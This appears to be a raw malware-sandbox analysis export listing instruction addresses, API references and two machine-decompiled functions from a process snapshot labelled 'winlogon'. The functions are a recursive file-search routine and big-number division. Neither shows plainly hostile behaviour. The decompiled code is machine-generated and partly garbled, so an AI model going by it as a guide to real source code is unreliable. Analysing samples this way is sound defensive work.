    0x00d6b7e5
    0x00d6b7e5
    0x00d6b7e0
    0x00d6b7f2
    0x00d6b7f4
    0x00d6b7fb
    0x00d6b80a
    0x00d6b815
    0x00d6b818
    0x00d6b81b
    0x00d6b82c
    0x00d6b832
    0x00d6b837
    0x00d6b83a
    0x00d6b848
    0x00d6b84d
    0x00d6b852
    0x00d6b85c
    0x00d6b85c
    0x00d6b84d
    0x00d6b82c
    0x00d6b80a
    0x00000000
    0x00d6b7f2
    0x00d6b75e
    0x00d6b768
    0x00d6b78d
    0x00d6b793
    0x00d6b796
    0x00000000
    0x00000000
    0x00000000
    0x00000000

    APIs
    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00D6B6E7
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D75F8F, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127
    C-Code - Quality: 72%
    			E00D75F8F(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr _v28;
				signed int _v32;
				WCHAR* _v36;
				signed int _v48;
				intOrPtr _v556;
				intOrPtr _v558;
				struct _WIN32_FIND_DATAW _v604;
				intOrPtr* _v608;
				signed int _v612;
				signed int _v616;
				intOrPtr _v644;
				intOrPtr _v648;
				signed int _t40;
				signed int _t45;
				signed int _t48;
				signed int _t50;
				signed int _t51;
				signed char _t53;
				signed int _t62;
				void* _t64;
				union _FINDEX_INFO_LEVELS _t66;
				signed int _t71;
				intOrPtr* _t72;
				signed int _t75;
				void* _t82;
				void* _t84;
				signed int _t85;
				void* _t89;
				WCHAR* _t90;
				intOrPtr* _t94;
				intOrPtr _t97;
				void* _t99;
				signed int _t100;
				intOrPtr* _t104;
				signed int _t107;
				void* _t110;
				intOrPtr _t111;
				void* _t112;
				void* _t114;
				void* _t115;
				signed int _t117;
				void* _t118;
				union _FINDEX_INFO_LEVELS _t119;
				void* _t124;
				void* _t125;
				signed int _t126;
				void* _t127;
				signed int _t132;
				void* _t133;
				signed int _t134;
				void* _t135;
				void* _t136;

				_push(__ecx);
				_t94 = _a4;
				_push(__ebx);
				_push(__edi);
				_t2 = _t94 + 2; // 0x2
				_t110 = _t2;
				do {
					_t40 =  *_t94;
					_t94 = _t94 + 2;
				} while (_t40 != 0);
				_t117 = _a12;
				_t97 = (_t94 - _t110 >> 1) + 1;
				_v8 = _t97;
				if(_t97 <= (_t40 | 0xffffffff) - _t117) {
					_push(__esi);
					_t5 = _t117 + 1; // 0x1
					_t89 = _t5 + _t97;
					_t124 = E00D71890(_t97, _t89, 2);
					_pop(_t99);
					__eflags = _t117;
					if(_t117 == 0) {
						L6:
						_push(_v8);
						_t89 = _t89 - _t117;
						_t45 = E00D75D9F(_t99, _t124 + _t117 * 2, _t89, _a4);
						_t134 = _t133 + 0x10;
						__eflags = _t45;
						if(__eflags != 0) {
							goto L9;
						} else {
							_t82 = E00D76208(_a16, __eflags, _t124);
							E00D717C5(0);
							_t84 = _t82;
							goto L8;
						}
					} else {
						_push(_t117);
						_t85 = E00D75D9F(_t99, _t124, _t89, _a8);
						_t134 = _t133 + 0x10;
						__eflags = _t85;
						if(_t85 != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E00D70296();
							asm("int3");
							_t132 = _t134;
							_t135 = _t134 - 0x260;
							_t48 =  *0xd88004; // 0x276b9783
							_v48 = _t48 ^ _t132;
							_t111 = _v28;
							_t100 = _v32;
							_push(_t89);
							_t90 = _v36;
							_push(_t124);
							_push(_t117);
							_t125 = 0x5c;
							_v644 = _t111;
							_v648 = 0x2f;
							_t118 = 0x3a;
							while(1) {
								__eflags = _t100 - _t90;
								if(_t100 == _t90) {
									break;
								}
								_t50 =  *_t100 & 0x0000ffff;
								__eflags = _t50 - _v612;
								if(_t50 != _v612) {
									__eflags = _t50 - _t125;
									if(_t50 != _t125) {
										__eflags = _t50 - _t118;
										if(_t50 != _t118) {
											_t100 = _t100 - 2;
											__eflags = _t100;
											continue;
										}
									}
								}
								break;
							}
							_t126 =  *_t100 & 0x0000ffff;
							__eflags = _t126 - _t118;
							if(_t126 != _t118) {
								L19:
								_t51 = _t126;
								_t119 = 0;
								_t112 = 0x2f;
								__eflags = _t51 - _t112;
								if(_t51 == _t112) {
									L23:
									_t53 = 1;
									__eflags = 1;
								} else {
									_t114 = 0x5c;
									__eflags = _t51 - _t114;
									if(_t51 == _t114) {
										goto L23;
									} else {
										_t115 = 0x3a;
										__eflags = _t51 - _t115;
										if(_t51 == _t115) {
											goto L23;
										} else {
											_t53 = 0;
										}
									}
								}
								_t103 = (_t100 - _t90 >> 1) + 1;
								asm("sbb eax, eax");
								_v612 =  ~(_t53 & 0x000000ff) & (_t100 - _t90 >> 0x00000001) + 0x00000001;
								E00D6D520(_t119,  &_v604, _t119, 0x250);
								_t136 = _t135 + 0xc;
								_t127 = FindFirstFileExW(_t90, _t119,  &_v604, _t119, _t119, _t119);
								__eflags = _t127 - 0xffffffff;
								if(_t127 != 0xffffffff) {
									_t104 = _v608;
									_t62 =  *((intOrPtr*)(_t104 + 4)) -  *_t104;
									__eflags = _t62;
									_v616 = _t62 >> 2;
									_t64 = 0x2e;
									do {
										__eflags = _v604.cFileName - _t64;
										if(_v604.cFileName != _t64) {
											L36:
											_push(_t104);
											_t66 = E00D75F8F(_t90, _t104, _t119, _t127,  &(_v604.cFileName), _t90, _v612);
											_t136 = _t136 + 0x10;
											__eflags = _t66;
											if(_t66 != 0) {
												goto L26;
											} else {
												goto L37;
											}
										} else {
											__eflags = _v558 - _t119;
											if(_v558 == _t119) {
												goto L37;
											} else {
												__eflags = _v558 - _t64;
												if(_v558 != _t64) {
													goto L36;
												} else {
													__eflags = _v556 - _t119;
													if(_v556 == _t119) {
														goto L37;
													} else {
														goto L36;
													}
												}
											}
										}
										goto L40;
										L37:
										_t71 = FindNextFileW(_t127,  &_v604);
										_t104 = _v608;
										__eflags = _t71;
										_t64 = 0x2e;
									} while (_t71 != 0);
									_t72 = _t104;
									_t107 = _v616;
									_t113 =  *_t72;
									_t75 =  *((intOrPtr*)(_t72 + 4)) -  *_t72 >> 2;
									__eflags = _t107 - _t75;
									if(_t107 != _t75) {
										E00D7AE90(_t90, _t119, _t127, _t113 + _t107 * 4, _t75 - _t107, 4, E00D75DAA);
									}
								} else {
									_push(_v608);
									_t66 = E00D75F8F(_t90, _t103, _t119, _t127, _t90, _t119, _t119);
									L26:
									_t119 = _t66;
								}
								__eflags = _t127 - 0xffffffff;
								if(_t127 != 0xffffffff) {
									FindClose(_t127);
								}
							} else {
								__eflags = _t100 -  &(_t90[1]);
								if(_t100 ==  &(_t90[1])) {
									goto L19;
								} else {
									_push(_t111);
									E00D75F8F(_t90, _t100, 0, _t126, _t90, 0, 0);
								}
							}
							__eflags = _v12 ^ _t132;
							return E00D6ABE4(_v12 ^ _t132);
						} else {
							goto L6;
						}
					}
				} else {
					_t84 = 0xc;
					L8:
					return _t84;
				}
				L40:
			}

























































    0x00d75f94
    0x00d75f95
    0x00d75f98
    0x00d75f99
    0x00d75f9c
    0x00d75f9c
    0x00d75f9f
    0x00d75f9f
    0x00d75fa2
    0x00d75fa5
    0x00d75faa
    0x00d75fb4
    0x00d75fb7
    0x00d75fbc
    0x00d75fc3
    0x00d75fc4
    0x00d75fc7
    0x00d75fd1
    0x00d75fd4
    0x00d75fd5
    0x00d75fd7
    0x00d75feb
    0x00d75feb
    0x00d75fee
    0x00d75ff8
    0x00d75ffd
    0x00d76000
    0x00d76002
    0x00000000
    0x00d76004
    0x00d76008
    0x00d76011
    0x00d76017
    0x00000000
    0x00d76019
    0x00d75fd9
    0x00d75fd9
    0x00d75fdf
    0x00d75fe4
    0x00d75fe7
    0x00d75fe9
    0x00d76020
    0x00d76022
    0x00d76023
    0x00d76024
    0x00d76025
    0x00d76026
    0x00d76027
    0x00d7602c
    0x00d76030
    0x00d76032
    0x00d76038
    0x00d7603f
    0x00d76042
    0x00d76045
    0x00d76048
    0x00d76049
    0x00d7604c
    0x00d7604d
    0x00d76050
    0x00d76053
    0x00d76059
    0x00d76063
    0x00d7607f
    0x00d7607f
    0x00d76081
    0x00000000
    0x00000000
    0x00d76066
    0x00d76069
    0x00d76070
    0x00d76072
    0x00d76075
    0x00d76077
    0x00d7607a
    0x00d7607c
    0x00d7607c
    0x00000000
    0x00d7607c
    0x00d7607a
    0x00d76075
    0x00000000
    0x00d76070
    0x00d76083
    0x00d76086
    0x00d76089
    0x00d760a5
    0x00d760a7
    0x00d760a9
    0x00d760ab
    0x00d760ac
    0x00d760af
    0x00d760c5
    0x00d760c7
    0x00d760c7
    0x00d760b1
    0x00d760b3
    0x00d760b4
    0x00d760b7
    0x00000000
    0x00d760b9
    0x00d760bb
    0x00d760bc
    0x00d760bf
    0x00000000
    0x00d760c1
    0x00d760c1
    0x00d760c1
    0x00d760bf
    0x00d760b7
    0x00d760cf
    0x00d760d7
    0x00d760db
    0x00d760e9
    0x00d760ee
    0x00d76103
    0x00d76105
    0x00d76108
    0x00d7613d
    0x00d76148
    0x00d76148
    0x00d7614d
    0x00d76153
    0x00d76154
    0x00d76154
    0x00d7615b
    0x00d76178
    0x00d76178
    0x00d76187
    0x00d7618c
    0x00d7618f
    0x00d76191
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00d7615d
    0x00d7615d
    0x00d76164
    0x00000000
    0x00d76166
    0x00d76166
    0x00d7616d
    0x00000000
    0x00d7616f
    0x00d7616f
    0x00d76176
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00d76176
    0x00d7616d
    0x00d76164
    0x00000000
    0x00d76193
    0x00d7619b
    0x00d761a1
    0x00d761a7
    0x00d761ab
    0x00d761ab
    0x00d761ae
    0x00d761b0
    0x00d761b6
    0x00d761bd
    0x00d761c0
    0x00d761c2
    0x00d761d6
    0x00d761db
    0x00d7610a
    0x00d76110
    0x00d76114
    0x00d7611c
    0x00d7611c
    0x00d7611c
    0x00d7611e
    0x00d76121
    0x00d76124
    0x00d76124
    0x00d7608b
    0x00d7608e
    0x00d76090
    0x00000000
    0x00d76092
    0x00d76092
    0x00d76098
    0x00d7609d
    0x00d76090
    0x00d76131
    0x00d7613c
    0x00000000
    0x00000000
    0x00000000
    0x00d75fe9
    0x00d75fbe
    0x00d75fc0
    0x00d7601a
    0x00d7601f
    0x00d7601f
    0x00000000

    APIs
      • Part of subcall function 00D71890: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00D7200F,00000001,00000364,?,?,?,00D72127,00D717EB,?,?,00D61B36), ref: 00D718D1
      • Part of subcall function 00D70296: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D70298
      • Part of subcall function 00D70296: GetCurrentProcess.KERNEL32(C0000417,?,?), ref: 00D702BA
      • Part of subcall function 00D70296: TerminateProcess.KERNEL32(00000000), ref: 00D702C1
    • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000001), ref: 00D760FD
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D793F0, Relevance: 3.5, APIs: 2, Instructions: 464Crypto
    C-Code - Quality: 90%
    			E00D793F0(signed int* _a4, signed int* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int* _v80;
				char _v540;
				signed int _v544;
				signed int _t197;
				signed int _t198;
				signed int* _t200;
				signed int _t201;
				signed int _t204;
				signed int _t206;
				signed int _t208;
				signed int _t209;
				signed int _t213;
				signed int _t219;
				intOrPtr _t225;
				void* _t228;
				signed int _t230;
				signed int _t247;
				signed int _t250;
				void* _t253;
				signed int _t256;
				signed int* _t262;
				signed int _t263;
				signed int _t264;
				void* _t265;
				intOrPtr* _t266;
				signed int _t267;
				signed int _t269;
				signed int _t270;
				signed int _t271;
				signed int _t272;
				signed int* _t274;
				signed int* _t278;
				signed int _t279;
				signed int _t280;
				intOrPtr _t282;
				void* _t286;
				signed char _t292;
				signed int _t295;
				signed int _t303;
				signed int _t306;
				signed int _t307;
				signed int _t309;
				signed int _t311;
				signed int _t313;
				intOrPtr* _t314;
				signed int _t318;
				signed int _t322;
				signed int* _t328;
				signed int _t330;
				signed int _t331;
				signed int _t333;
				void* _t334;
				signed int _t336;
				signed int _t338;
				signed int _t341;
				signed int _t342;
				signed int* _t344;
				signed int _t349;
				signed int _t351;
				void* _t355;
				signed int _t359;
				signed int _t360;
				signed int _t362;
				signed int* _t368;
				signed int* _t369;
				signed int* _t370;
				signed int* _t373;

				_t262 = _a4;
				_t197 =  *_t262;
				if(_t197 != 0) {
					_t328 = _a8;
					_t267 =  *_t328;
					__eflags = _t267;
					if(_t267 != 0) {
						_t3 = _t197 - 1; // -1
						_t349 = _t3;
						_t4 = _t267 - 1; // -1
						_t198 = _t4;
						_v16 = _t349;
						__eflags = _t198;
						if(_t198 != 0) {
							__eflags = _t198 - _t349;
							if(_t198 > _t349) {
								L23:
								__eflags = 0;
								return 0;
							} else {
								_t46 = _t198 + 1; // 0x0
								_t306 = _t349 - _t198;
								_v60 = _t46;
								_t269 = _t349;
								__eflags = _t349 - _t306;
								if(_t349 < _t306) {
									L21:
									_t306 = _t306 + 1;
									__eflags = _t306;
								} else {
									_t368 =  &(_t262[_t349 + 1]);
									_t341 =  &(( &(_t328[_t269 - _t306]))[1]);
									__eflags = _t341;
									while(1) {
										__eflags =  *_t341 -  *_t368;
										if( *_t341 !=  *_t368) {
											break;
										}
										_t269 = _t269 - 1;
										_t341 = _t341 - 4;
										_t368 = _t368 - 4;
										__eflags = _t269 - _t306;
										if(_t269 >= _t306) {
											continue;
										} else {
											goto L21;
										}
										goto L22;
									}
									_t369 = _a8;
									_t54 = (_t269 - _t306) * 4; // 0xfc23b5a
									__eflags =  *((intOrPtr*)(_t369 + _t54 + 4)) -  *((intOrPtr*)(_t262 + 4 + _t269 * 4));
									if( *((intOrPtr*)(_t369 + _t54 + 4)) <  *((intOrPtr*)(_t262 + 4 + _t269 * 4))) {
										goto L21;
									}
								}
								L22:
								__eflags = _t306;
								if(__eflags != 0) {
									_t330 = _v60;
									_t200 = _a8;
									_t351 =  *(_t200 + _t330 * 4);
									_t64 = _t330 * 4; // 0xffffe9e5
									_t201 =  *((intOrPtr*)(_t200 + _t64 - 4));
									_v36 = _t201;
									asm("bsr eax, esi");
									_v56 = _t351;
									if(__eflags == 0) {
										_t270 = 0x20;
									} else {
										_t270 = 0x1f - _t201;
									}
									_v40 = _t270;
									_v64 = 0x20 - _t270;
									__eflags = _t270;
									if(_t270 != 0) {
										_t292 = _v40;
										_v36 = _v36 << _t292;
										_v56 = _t351 << _t292 | _v36 >> _v64;
										__eflags = _t330 - 2;
										if(_t330 > 2) {
											_t79 = _t330 * 4; // 0xe850ffff
											_t81 =  &_v36;
											 *_t81 = _v36 |  *(_a8 + _t79 - 8) >> _v64;
											__eflags =  *_t81;
										}
									}
									_v76 = 0;
									_t307 = _t306 + 0xffffffff;
									__eflags = _t307;
									_v32 = _t307;
									if(_t307 < 0) {
										_t331 = 0;
										__eflags = 0;
									} else {
										_t85 =  &(_t262[1]); // 0x4
										_v20 =  &(_t85[_t307]);
										_t206 = _t307 + _t330;
										_t90 = _t262 - 4; // -4
										_v12 = _t206;
										_t278 = _t90 + _t206 * 4;
										_v80 = _t278;
										do {
											__eflags = _t206 - _v16;
											if(_t206 > _v16) {
												_t207 = 0;
												__eflags = 0;
											} else {
												_t207 = _t278[2];
											}
											__eflags = _v40;
											_t311 = _t278[1];
											_t279 =  *_t278;
											_v52 = _t207;
											_v44 = 0;
											_v8 = _t207;
											_v24 = _t279;
											if(_v40 > 0) {
												_t318 = _v8;
												_t336 = _t279 >> _v64;
												_t230 = E00D7DA00(_t311, _v40, _t318);
												_t279 = _v40;
												_t207 = _t318;
												_t311 = _t336 | _t230;
												_t359 = _v24 << _t279;
												__eflags = _v12 - 3;
												_v8 = _t318;
												_v24 = _t359;
												if(_v12 >= 3) {
													_t279 = _v64;
													_t360 = _t359 |  *(_t262 + (_v60 + _v32) * 4 - 8) >> _t279;
													__eflags = _t360;
													_t207 = _v8;
													_v24 = _t360;
												}
											}
											_t208 = E00D7D6E0(_t311, _t207, _v56, 0);
											_v44 = _t262;
											_t263 = _t208;
											_v44 = 0;
											_t209 = _t311;
											_v8 = _t263;
											_v28 = _t209;
											_t333 = _t279;
											_v72 = _t263;
											_v68 = _t209;
											__eflags = _t209;
											if(_t209 != 0) {
												L40:
												_t264 = _t263 + 1;
												asm("adc eax, 0xffffffff");
												_t333 = _t333 + E00D7D8C0(_t264, _t209, _v56, 0);
												asm("adc esi, edx");
												_t263 = _t264 | 0xffffffff;
												_t209 = 0;
												__eflags = 0;
												_v44 = 0;
												_v8 = _t263;
												_v72 = _t263;
												_v28 = 0;
												_v68 = 0;
											} else {
												__eflags = _t263 - 0xffffffff;
												if(_t263 > 0xffffffff) {
													goto L40;
												}
											}
											__eflags = 0;
											if(0 <= 0) {
												if(0 < 0) {
													goto L44;
												} else {
													__eflags = _t333 - 0xffffffff;
													if(_t333 <= 0xffffffff) {
														while(1) {
															L44:
															_v8 = _v24;
															_t228 = E00D7D8C0(_v36, 0, _t263, _t209);
															__eflags = _t311 - _t333;
															if(__eflags < 0) {
																break;
															}
															if(__eflags > 0) {
																L47:
																_t209 = _v28;
																_t263 = _t263 + 0xffffffff;
																_v72 = _t263;
																asm("adc eax, 0xffffffff");
																_t333 = _t333 + _v56;
																__eflags = _t333;
																_v28 = _t209;
																asm("adc dword [ebp-0x28], 0x0");
																_v68 = _t209;
																if(_t333 == 0) {
																	__eflags = _t333 - 0xffffffff;
																	if(_t333 <= 0xffffffff) {
																		continue;
																	} else {
																	}
																}
															} else {
																__eflags = _t228 - _v8;
																if(_t228 <= _v8) {
																	break;
																} else {
																	goto L47;
																}
															}
															L51:
															_v8 = _t263;
															goto L52;
														}
														_t209 = _v28;
														goto L51;
													}
												}
											}
											L52:
											__eflags = _t209;
											if(_t209 != 0) {
												L54:
												_t280 = _v60;
												_t334 = 0;
												_t355 = 0;
												__eflags = _t280;
												if(_t280 != 0) {
													_t266 = _v20;
													_t219 =  &(_a8[1]);
													__eflags = _t219;
													_v24 = _t219;
													_v16 = _t280;
													do {
														_v44 =  *_t219;
														_t225 =  *_t266;
														_t286 = _t334 + _v72 * _v44;
														asm("adc esi, edx");
														_t334 = _t355;
														_t355 = 0;
														__eflags = _t225 - _t286;
														if(_t225 < _t286) {
															_t334 = _t334 + 1;
															asm("adc esi, esi");
														}
														 *_t266 = _t225 - _t286;
														_t266 = _t266 + 4;
														_t219 = _v24 + 4;
														_t164 =  &_v16;
														 *_t164 = _v16 - 1;
														__eflags =  *_t164;
														_v24 = _t219;
													} while ( *_t164 != 0);
													_t263 = _v8;
													_t280 = _v60;
												}
												__eflags = 0 - _t355;
												if(__eflags <= 0) {
													if(__eflags < 0) {
														L63:
														__eflags = _t280;
														if(_t280 != 0) {
															_t338 = _t280;
															_t314 = _v20;
															_t362 =  &(_a8[1]);
															__eflags = _t362;
															_t265 = 0;
															do {
																_t282 =  *_t314;
																_t172 = _t362 + 4; // 0xa6a5959
																_t362 = _t172;
																_t314 = _t314 + 4;
																asm("adc eax, eax");
																 *((intOrPtr*)(_t314 - 4)) = _t282 +  *((intOrPtr*)(_t362 - 4)) + _t265;
																asm("adc eax, 0x0");
																_t265 = 0;
																_t338 = _t338 - 1;
																__eflags = _t338;
															} while (_t338 != 0);
															_t263 = _v8;
														}
														_t263 = _t263 + 0xffffffff;
														asm("adc dword [ebp-0x18], 0xffffffff");
													} else {
														__eflags = _v52 - _t334;
														if(_v52 < _t334) {
															goto L63;
														}
													}
												}
												_t213 = _v12 - 1;
												__eflags = _t213;
												_v16 = _t213;
											} else {
												__eflags = _t263;
												if(_t263 != 0) {
													goto L54;
												}
											}
											_t331 = 0 + _t263;
											asm("adc esi, 0x0");
											_v20 = _v20 - 4;
											_t313 = _v32 - 1;
											_t262 = _a4;
											_t278 = _v80 - 4;
											_t206 = _v12 - 1;
											_v76 = _t331;
											_v32 = _t313;
											_v80 = _t278;
											_v12 = _t206;
											__eflags = _t313;
										} while (_t313 >= 0);
									}
									_t309 = _v16 + 1;
									_t204 = _t309;
									__eflags = _t204 -  *_t262;
									if(_t204 <  *_t262) {
										_t191 = _t204 + 1; // 0xd7aa0d
										_t274 =  &(_t262[_t191]);
										do {
											 *_t274 = 0;
											_t194 =  &(_t274[1]); // 0x91850fc2
											_t274 = _t194;
											_t204 = _t204 + 1;
											__eflags = _t204 -  *_t262;
										} while (_t204 <  *_t262);
									}
									 *_t262 = _t309;
									__eflags = _t309;
									if(_t309 != 0) {
										while(1) {
											_t271 =  *_t262;
											__eflags = _t262[_t271];
											if(_t262[_t271] != 0) {
												goto L78;
											}
											_t272 = _t271 + 0xffffffff;
											__eflags = _t272;
											 *_t262 = _t272;
											if(_t272 != 0) {
												continue;
											}
											goto L78;
										}
									}
									L78:
									return _t331;
								} else {
									goto L23;
								}
							}
						} else {
							_t6 =  &(_t328[1]); // 0xfc23b5a
							_t295 =  *_t6;
							_v44 = _t295;
							__eflags = _t295 - 1;
							if(_t295 != 1) {
								__eflags = _t349;
								if(_t349 != 0) {
									_t342 = 0;
									_v12 = 0;
									_v8 = 0;
									_v20 = 0;
									__eflags = _t349 - 0xffffffff;
									if(_t349 != 0xffffffff) {
										_t250 = _v16 + 1;
										__eflags = _t250;
										_v32 = _t250;
										_t373 =  &(_t262[_t349 + 1]);
										do {
											_t253 = E00D7D6E0( *_t373, _t342, _t295, 0);
											_v68 = _t303;
											_t373 = _t373 - 4;
											_v20 = _t262;
											_t342 = _t295;
											_t303 = 0 + _t253;
											asm("adc ecx, 0x0");
											_v12 = _t303;
											_t34 =  &_v32;
											 *_t34 = _v32 - 1;
											__eflags =  *_t34;
											_v8 = _v12;
											_t295 = _v44;
										} while ( *_t34 != 0);
										_t262 = _a4;
									}
									_v544 = 0;
									_t41 =  &(_t262[1]); // 0x4
									_t370 = _t41;
									 *_t262 = 0;
									E00D7AC3A(_t370, 0x1cc,  &_v540, 0);
									_t247 = _v20;
									__eflags = 0 - _t247;
									 *_t370 = _t342;
									_t262[2] = _t247;
									asm("sbb ecx, ecx");
									__eflags =  ~0x00000000;
									 *_t262 = 0xbadbae;
									return _v12;
								} else {
									_t14 =  &(_t262[1]); // 0x4
									_t344 = _t14;
									_v544 = 0;
									 *_t262 = 0;
									E00D7AC3A(_t344, 0x1cc,  &_v540, 0);
									_t256 = _t262[1];
									_t322 = _t256 % _v44;
									__eflags = 0 - _t322;
									 *_t344 = _t322;
									asm("sbb ecx, ecx");
									__eflags = 0;
									 *_t262 =  ~0x00000000;
									return _t256 / _v44;
								}
							} else {
								_t9 =  &(_t262[1]); // 0x4
								_v544 = _t198;
								 *_t262 = _t198;
								E00D7AC3A(_t9, 0x1cc,  &_v540, _t198);
								__eflags = 0;
								return _t262[1];
							}
						}
					} else {
						__eflags = 0;
						return 0;
					}
				} else {
					return _t197;
				}
			}























































































    0x00d793fc
    0x00d793ff
    0x00d79403
    0x00d7940d
    0x00d79410
    0x00d79412
    0x00d79414
    0x00d79421
    0x00d79421
    0x00d79424
    0x00d79424
    0x00d79427
    0x00d7942a
    0x00d7942c
    0x00d7955f
    0x00d79561
    0x00d795aa
    0x00d795ae
    0x00d795b4
    0x00d79563
    0x00d79565
    0x00d79568
    0x00d7956a
    0x00d7956d
    0x00d7956f
    0x00d79571
    0x00d795a5
    0x00d795a5
    0x00d795a5
    0x00d79573
    0x00d79578
    0x00d7957e
    0x00d7957e
    0x00d79581
    0x00d79583
    0x00d79585
    0x00000000
    0x00000000
    0x00d79587
    0x00d79588
    0x00d7958b
    0x00d7958e
    0x00d79590
    0x00000000
    0x00d79592
    0x00000000
    0x00d79592
    0x00000000
    0x00d79590
    0x00d79594
    0x00d7959b
    0x00d7959f
    0x00d795a3
    0x00000000
    0x00000000
    0x00d795a3
    0x00d795a6
    0x00d795a6
    0x00d795a8
    0x00d795b5
    0x00d795b8
    0x00d795bb
    0x00d795be
    0x00d795be
    0x00d795c2
    0x00d795c5
    0x00d795c8
    0x00d795cb
    0x00d795d6
    0x00d795cd
    0x00d795d2
    0x00d795d2
    0x00d795e0
    0x00d795e5
    0x00d795e8
    0x00d795ea
    0x00d795f4
    0x00d795f7
    0x00d795fe
    0x00d79601
    0x00d79604
    0x00d7960c
    0x00d79612
    0x00d79612
    0x00d79612
    0x00d79612
    0x00d79604
    0x00d79617
    0x00d7961e
    0x00d7961e
    0x00d79621
    0x00d79624
    0x00d79856
    0x00d79856
    0x00d7962a
    0x00d7962a
    0x00d79630
    0x00d79633
    0x00d79636
    0x00d79639
    0x00d7963c
    0x00d7963f
    0x00d79642
    0x00d79642
    0x00d79645
    0x00d7964c
    0x00d7964c
    0x00d79647
    0x00d79647
    0x00d79647
    0x00d7964e
    0x00d79652
    0x00d79655
    0x00d79657
    0x00d7965a
    0x00d79661
    0x00d79664
    0x00d79667
    0x00d79672
    0x00d79675
    0x00d7967a
    0x00d7967f
    0x00d79686
    0x00d7968b
    0x00d7968d
    0x00d7968f
    0x00d79693
    0x00d79696
    0x00d79699
    0x00d796a1
    0x00d796aa
    0x00d796aa
    0x00d796ac
    0x00d796af
    0x00d796af
    0x00d79699
    0x00d796b9
    0x00d796be
    0x00d796c3
    0x00d796c5
    0x00d796c8
    0x00d796ca
    0x00d796cd
    0x00d796d0
    0x00d796d2
    0x00d796d5
    0x00d796d8
    0x00d796da
    0x00d796e1
    0x00d796e6
    0x00d796e9
    0x00d796f3
    0x00d796f5
    0x00d796f7
    0x00d796fa
    0x00d796fa
    0x00d796fc
    0x00d796ff
    0x00d79702
    0x00d79705
    0x00d79708
    0x00d796dc
    0x00d796dc
    0x00d796df
    0x00000000
    0x00000000
    0x00d796df
    0x00d7970b
    0x00d7970d
    0x00d7970f
    0x00000000
    0x00d79711
    0x00d79711
    0x00d79714
    0x00d79716
    0x00d79716
    0x00d79724
    0x00d79727
    0x00d7972c
    0x00d7972e
    0x00000000
    0x00000000
    0x00d79730
    0x00d79737
    0x00d79737
    0x00d7973a
    0x00d7973d
    0x00d79740
    0x00d79743
    0x00d79743
    0x00d79746
    0x00d79749
    0x00d7974d
    0x00d79750
    0x00d79752
    0x00d79755
    0x00000000
    0x00000000
    0x00d79757
    0x00d79755
    0x00d79732
    0x00d79732
    0x00d79735
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00d79735
    0x00d7975c
    0x00d7975c
    0x00000000
    0x00d7975c
    0x00d79759
    0x00000000
    0x00d79759
    0x00d79714
    0x00d7970f
    0x00d7975f
    0x00d7975f
    0x00d79761
    0x00d7976b
    0x00d7976b
    0x00d7976e
    0x00d79770
    0x00d79772
    0x00d79774
    0x00d79779
    0x00d7977c
    0x00d7977c
    0x00d7977f
    0x00d79782
    0x00d79785
    0x00d79787
    0x00d7979c
    0x00d7979e
    0x00d797a0
    0x00d797a2
    0x00d797a4
    0x00d797a6
    0x00d797a8
    0x00d797aa
    0x00d797ad
    0x00d797ad
    0x00d797b1
    0x00d797b3
    0x00d797b9
    0x00d797bc
    0x00d797bc
    0x00d797bc
    0x00d797c0
    0x00d797c0
    0x00d797c5
    0x00d797c8
    0x00d797c8
    0x00d797cd
    0x00d797cf
    0x00d797d1
    0x00d797d8
    0x00d797d8
    0x00d797da
    0x00d797df
    0x00d797e1
    0x00d797e4
    0x00d797e4
    0x00d797e7
    0x00d797f0
    0x00d797f0
    0x00d797f2
    0x00d797f2
    0x00d797f7
    0x00d797fd
    0x00d79801
    0x00d79804
    0x00d79807
    0x00d79809
    0x00d79809
    0x00d79809
    0x00d7980e
    0x00d7980e
    0x00d79811
    0x00d79814
    0x00d797d3
    0x00d797d3
    0x00d797d6
    0x00000000
    0x00000000
    0x00d797d6
    0x00d797d1
    0x00d7981b
    0x00d7981b
    0x00d7981c
    0x00d79763
    0x00d79763
    0x00d79765
    0x00000000
    0x00000000
    0x00d79765
    0x00d7982c
    0x00d79831
    0x00d79834
    0x00d79838
    0x00d79839
    0x00d7983c
    0x00d7983f
    0x00d79840
    0x00d79843
    0x00d79846
    0x00d79849
    0x00d7984c
    0x00d7984c
    0x00d79854
    0x00d7985b
    0x00d7985c
    0x00d7985e
